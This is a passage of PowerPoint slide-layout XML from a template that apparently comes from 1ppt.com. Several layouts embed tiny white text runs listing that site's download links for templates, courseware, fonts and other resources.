              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout196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96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96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96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9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97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97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97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97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97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97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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout197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97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97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97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9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98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98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98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98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98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98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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout198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98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98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98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9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99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99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99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99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99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99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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
